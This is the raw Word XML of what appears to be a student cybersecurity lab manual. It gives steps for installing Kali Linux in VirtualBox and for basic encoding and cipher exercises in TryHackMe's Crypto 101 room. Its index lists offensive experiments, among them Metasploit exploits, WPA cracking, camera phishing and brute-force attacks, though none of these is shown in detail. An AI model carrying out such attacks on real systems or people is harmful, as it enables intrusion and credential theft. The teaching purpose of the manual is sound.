          <w:p w14:paraId="10E7D38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Demonstrate various exploits of Window OS using Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28A9C49F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13E8C98D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5B21A898" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73D799E2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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3137628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Perform Wireless Audit on routers and decrypt the WPA keys using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Aircrack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>-ng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34CB660D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A16E37A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33B9958F" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="354DB100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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="008C286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IP Spoofing using a GitHub Tool (Educational Demonstration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BF73510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5BB7662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0394D497" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71AB6C3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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5864191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of Camera Phishing using Open-Source GitHub Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1323FC7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669880DF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6FB9711" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FAC55B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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1160EB1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of Phishing Attacks using Z-Phisher (GitHub Tool)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E272E8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50304609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36276635" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CDF522C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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E604A8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and Demonstration of Brute Force Password Attack in a Controlled Kali Linux Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F1745FA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AE45F43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088C311" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="005425BC" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1340"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A707FB" w14:textId="6AEA0CCF" w:rsidR="00F44251" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF762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a"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text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F44251" w14:paraId="5E51EDCF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="168F5904" w14:textId="23BC3386" w:rsidR="00F44251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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="1456BB08" w14:textId="77777777" w:rsidR="00F44251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INSTALLATION OF KALI LINUX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F44251" w14:paraId="0C103400" w14:textId="77777777" w:rsidTr="000F4FFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="081CF81E" w14:textId="73EEFF27" w:rsidR="00F44251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A67492D" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251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476F189E" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251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A7AC3B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install Kali Linux inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>virtualBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a pre-built VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F87312C" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50762160" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EEB4926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STEP-BY-STEP INSTALLATION OF KALI LINUX IN VIRTUALBOX:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03621884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0" w:name="_i01u74o4376v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Download and Install VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65532E0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you start, make sure VirtualBox is installed on your Windows computer. If you haven't installed it yet, follow these steps :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4319DDF2" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Visit the VirtualBox Download Page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52645C1D" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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the latest version for Windows hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2E9E26" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Run the .exe file and follow the onscreen installation guide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A75FAEF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" w:name="_ty3g8zwtog0s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Download Pre-Built Kali Linux Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2888A7" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7D124D42" wp14:editId="422AD815">
            <wp:extent cx="5943600" cy="3098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41F3D" w14:textId="77777777" w:rsidR="00EF7625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D0F42BC" w14:textId="6DDFD325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Now, Download the pre-built virtual machine :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D801EDA" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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visit the official pre-built virtual machine download page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372C9B70" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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choose the virtual machine version that is suitable for you and whichever you want like VirtualBox or VMware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4553F679" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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that file which contains a pre-built virtual machine and that file is in a 7zip file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4123512E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dnurdnxmbi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Extract downloaded pre-built virtual machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EE27A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will need the 7zip tool for extracting the file :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057418A0" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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7zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E15545" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Right-click the downloaded Kali Linux 7z file and select `7-Zip` &gt; ' Extract Here '.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9109CE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ev69yctgn0e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Import the Extracted VM file in the VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7331F4E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extracting the file with 7zip, you can import that virtual machine in VirtualBox by double clicking on that file or by following the below steps :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D56A6" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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open VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F420D92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0B08842" wp14:editId="70CC07D2">
            <wp:extent cx="5006340" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="8" name="image6.png" descr="Screenshot-2024-06-01-213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creenshot-2024-06-01-213427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6635" cy="1493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E3A3A" w14:textId="77777777" w:rsidR="00835F24" w:rsidRDefault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7E14964F" w14:textId="6531B4B4" w:rsidR="00F44251" w:rsidRDefault="00000000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t>Oracle VM VirtualBox Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AA04D3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6F09C9A0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4EDE4321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190EEA8A" w14:textId="6C486F12" w:rsidR="00835F24" w:rsidRDefault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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D9F58F" w14:textId="77777777" w:rsidR="00835F24" w:rsidRDefault="00835F24" w:rsidP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76D76396" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Click on the add button and navigate to the directory were the extracted virtual machine is stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40145A51" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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after selecting it click on the next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D378CC2" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRDefault="00000000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0BA999B" wp14:editId="31A389DE">
            <wp:extent cx="5943600" cy="1498600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="image1.png" descr="Screenshot-2024-06-01-213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-2024-06-01-213809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CF017" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRDefault="000F4FFB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67D9B3C2" w14:textId="371FE264" w:rsidR="00F44251" w:rsidRDefault="00000000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t>Kali Linux 2022.3 in Oracle VM VirtualBox Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583E3D22" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRDefault="000F4FFB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25D20D9E" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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After selecting file you will see interface like this, click on the kali machine and then start button to start the virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06612EB5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yuokd37y8lun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Initial Setup of machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949941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pre-built virtual machine will be boot-up, and the initial setup will begin. Remember that the default credentials of the virtual machine are :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C33B5A" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="288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Username : Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC8D558" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="288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Password : Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD6F4E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993D11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E5921D9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Kali Linux was successfully installed in VirtualBox using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>PreBuilt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM.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b/>
          <w:bCs/>
        </w:rPr>
        <w:br/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0F4FFB" w14:paraId="3824343D" w14:textId="77777777" w:rsidTr="008608D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="05D3936D" w14:textId="7EAB6970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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="20CB73BF" w14:textId="27338807" w:rsidR="000F4FFB" w:rsidRPr="000F4FFB" w:rsidRDefault="000F4FFB" w:rsidP="000F4FF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4F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ENCRYPTION CRYPTO 101 IN TRYHACKME PLATFORM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F4FFB" w14:paraId="7B7D7902" w14:textId="77777777" w:rsidTr="008608D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FF4D76F" w14:textId="77777777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EF99DE8" w14:textId="77777777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592BAC4A" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRDefault="000F4FFB" w:rsidP="000F4F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27A837B" w14:textId="59BD0B93" w:rsidR="00F44251" w:rsidRDefault="000F4FFB" w:rsidP="000F4FFB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 : </w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">To understand the fundamentals of </w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cryptography</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> by performing hands-on exercises in the </w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Crypto 101</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> room on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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platform, including basic encryption, encoding, hashing, and cryptographic concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70961FD9" w14:textId="4D348981" w:rsidR="000F4FFB" w:rsidRPr="000F4FFB" w:rsidRDefault="000F4FFB" w:rsidP="000F4FFB">
      <w:pPr>
        <w:spacing w:before="240"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TOOLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A62276A" w14:textId="58275929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Web browser (Chrome / Firefox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028EF044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Internet connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A4239D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account (free)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F71FBE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Built-in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terminal (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AttackBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) or local Linux machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C218A6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m52z1qj6xdgi"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="74DB747F" w14:textId="7F7C8124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THEORY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0B5470" w14:textId="20FF1528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</w:rPr>
        <w:t>Cryptography is the practice of securing information by converting plain text into unreadable format (cipher text) using encryption techniques.</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Crypto 101</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> introduces basic concepts such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB34459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Encoding vs Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7451E751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Symmetric and Asymmetric encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0523F83A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Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF68ED4" w14:textId="77777777" w:rsid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Common ciphers (Caesar, Base64, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC76C9E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155BE8F" w14:textId="63E7134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STEPS TO PERFORM THE EXPERIMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C58C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Step 1: Login to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</w:p>
    <w:p w14:paraId="0A679D0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Open browser and go to: https://tryhackme.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44009067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Login using your registered credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B09E5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6B7C1D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Step 2: Open Crypto 101 Room</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3294BC43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In the search bar, type Crypto 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0717A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Click on the room named Crypto 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2430A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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Click Join Room</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6C14B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5BAF19A9" w14:textId="77777777" w:rsidR="00CE2C37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664AA31" w14:textId="06253000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lastRenderedPageBreak/>
        <w:t>Step 3: Start the Machine (if required)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE20CAB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 xml:space="preserve">Click Start Machine / Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AttackBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="010CC10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Wait for the virtual environment to load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6157141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4ABC187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Step 4: Perform Cryptography Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2C3C4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Complete the tasks provided in the room, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38120AC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4.1 Encoding &amp; Decoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2735102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(a) Base64 Encoding / Decoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B8513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298825F6" w14:textId="67252834" w:rsidR="00CE2C37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Base64 is an encoding technique used to represent binary data in readable ASCII format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E78BA2A" w14:textId="77777777" w:rsidR="00CE2C37" w:rsidRPr="000F4FFB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191A5A88" w14:textId="230FC576" w:rsidR="00CE2C37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3B59DCDC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To Decode Base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E360358" w14:textId="677841E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Copy the given Base64 string from the question.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF7D37" w14:textId="0B8649FD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 xml:space="preserve">Open the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terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5803A53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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Use the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170AC29F" w14:textId="4BEFED3E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"Q3J5cHRvZ3JhcGh5" | base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9DD57A" w14:textId="4E6D4EB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4.</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>The output will be the decoded plain text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5407D3" w14:textId="2F17003B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5.</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Enter the decoded text into the answer box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BCD54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To Encode Base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381D1A44" w14:textId="188A9F33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"cryptography" | base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F856FF4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Expected Output Example:  Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D24C7E5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39BDC8A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7157762" w14:textId="11AE37B5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lastRenderedPageBreak/>
        <w:t>(b) Hexadecimal Conversion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D91A04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46BD9330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Hexadecimal is a base-16 encoding system commonly used in computing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01621959" w14:textId="77777777" w:rsidR="00835F24" w:rsidRDefault="00835F24" w:rsidP="00835F24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C46D67" w14:textId="35E7317B" w:rsidR="000F4FFB" w:rsidRPr="00CE2C37" w:rsidRDefault="000F4FFB" w:rsidP="00835F24">
      <w:pPr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17A607E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Hex to Text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5788CEC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echo 48656c6c6f | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>xxd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-r -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7FE691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Text to Hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD3805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echo "Hello" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>xxd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-p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2FF25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CE2C37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Expected Output:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C720B5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3E2ADB5B" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRPr="00835F24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835F24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Classical Ciphers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2E138B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3BB07B09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(a) Caesar Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6CE34E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78591BC5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Caesar cipher shifts letters by a fixed number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7344C87D" w14:textId="77777777" w:rsidR="00CE2C37" w:rsidRPr="000F4FFB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0D8B5F4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3C4F551D" w14:textId="30CC4ED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Identify the shift value (given or by trial).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8111B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Use online Caesar decoder or terminal tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5491DE64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7B0D89A7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Using terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAE3E1A" w14:textId="28FA13A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"KHOOR" | tr 'A-Z' 'X-ZA-W'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739164A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(Shift = 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD03D28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Expected Output:  HELLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC6E831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7ABC7982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5FC696A3" w14:textId="2B7320C2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lastRenderedPageBreak/>
        <w:t>(b) Shift-Based Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608DC859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3A4BF611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Similar to Caesar cipher but may use different shift values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2BCE0F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1ABFD55E" w14:textId="1CD1D82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Try different shift values until meaningful text appears.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C692AD9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Online tools can be used if allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B50002B" w14:textId="77777777" w:rsidR="00835F24" w:rsidRDefault="00835F24" w:rsidP="00835F24">
      <w:pPr>
        <w:rPr>
